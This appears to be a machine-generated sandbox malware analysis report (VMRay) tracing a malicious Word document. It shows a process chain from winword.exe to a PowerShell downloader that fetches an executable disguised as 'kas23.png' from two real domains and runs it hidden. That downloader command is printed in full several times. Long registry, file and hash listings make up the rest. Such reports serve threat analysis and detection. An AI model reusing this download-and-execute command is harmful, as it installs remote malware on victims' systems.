VMRay Analyzer Report for Sample #19183 VMRay Analyzer 2.2.0 URI www.events4u.cz Resolved_To Address 93.185.102.11 Process 1 2324 winword.exe 1384 winword.exe "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" C:\Users\aDU0VK IWA5kLS\Desktop\ c:\program files\microsoft office\office15\winword.exe Child_Of Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 2 2528 cmd.exe 2324 cmd.exe cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden" C:\Users\aDU0VK IWA5kLS\Desktop\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Process 3 2552 powershell.exe 2528 powershell.exe PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'');Start-Process ''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat;Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat' -WindowStyle Hidden" C:\Users\aDU0VK IWA5kLS\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 4 2596 cmd.exe 2552 cmd.exe cmd /c ""C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" " C:\Users\aDU0VK IWA5kLS\Desktop\ c:\windows\system32\cmd.exe Child_Of Created Read_From Created Wrote_To Opened Opened Opened Process 5 2624 powershell.exe 2596 powershell.exe PowerShell "function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe');Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe';}try{mihyr8('http://www.events4u.cz/kas23.png')}catch{mihyr8('http://tregartha-dinnie.co.uk/kas23.png')} C:\Users\aDU0VK IWA5kLS\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Created Created Opened Opened Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Connected_To Connected_To Connected_To Process 6 2840 mvmubw.exe 2624 mvmubw.exe "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe" C:\Users\aDU0VK IWA5kLS\Desktop\ c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe Child_Of Created Created Created Copied Opened Process 7 2920 mvnucw.exe 2840 mvnucw.exe "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe" C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\ c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe Child_Of Created Created Opened Process 8 2096 svchost.exe 2920 svchost.exe svchost.exe C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\ c:\windows\system32\svchost.exe Child_Of Child_Of Child_Of Read_From Created Created Created Created Created Created Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Process 9 692 taskeng.exe 852 taskeng.exe taskeng.exe {CFDCF914-63AE-4446-B16F-E0A62E2EE661} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:LUA[1] C:\Windows\system32\ c:\windows\system32\taskeng.exe Process 10 2000 taskeng.exe 852 taskeng.exe taskeng.exe {B729E5EE-8B96-46ED-936E-18C18B0189B1} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:Highest[1] C:\Windows\system32\ c:\windows\system32\taskeng.exe Process 11 1480 taskeng.exe 852 taskeng.exe taskeng.exe {33F40472-7093-4C44-9E45-95E720A6D75F} S-1-5-18:NT AUTHORITY\System:Service: C:\Windows\system32\ c:\windows\system32\taskeng.exe WinRegistryKey Licenses HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{000204EF-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\DesignerFeatures HKEY_CLASSES_ROOT WinRegistryKey Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32 HKEY_CLASSES_ROOT ThreadingModel WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080} HKEY_CLASSES_ROOT WinRegistryKey Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Control HKEY_CLASSES_ROOT WinRegistryKey Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Insertable HKEY_CLASSES_ROOT WinRegistryKey Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID HKEY_CLASSES_ROOT File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\certificate.format.ps1xml windows\system32\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File conout$ File users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat c:\ c:\users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat bat MD5 6b02cf51939341cf79053976790bdae0 SHA1 7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed SHA256 845ed9e3626f3b603301c7ab1987d763c13a9d8ee4444e69f181e52ebb881252 File STD_INPUT_HANDLE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase ApplicationBase ApplicationBase WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB File STD_INPUT_HANDLE File users\adu0vk~1\appdata\local\temp\mbovxo.bat users\adu0vk~1\appdata\local\temp\mbovxo.bat c:\ c:\users\adu0vk~1\appdata\local\temp\mbovxo.bat bat File STD_OUTPUT_HANDLE File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\certificate.format.ps1xml windows\system32\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework64\v2.0.50727\config\machine.config windows\microsoft.net\framework64\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config config File conout$ File users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe c:\ c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe exe MD5 0ebfd6e45dea48c7f54b5574d69da458 SHA1 11ad0fae8318bc72e1525c161c5df72a9da9430b SHA256 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581 File STD_INPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey 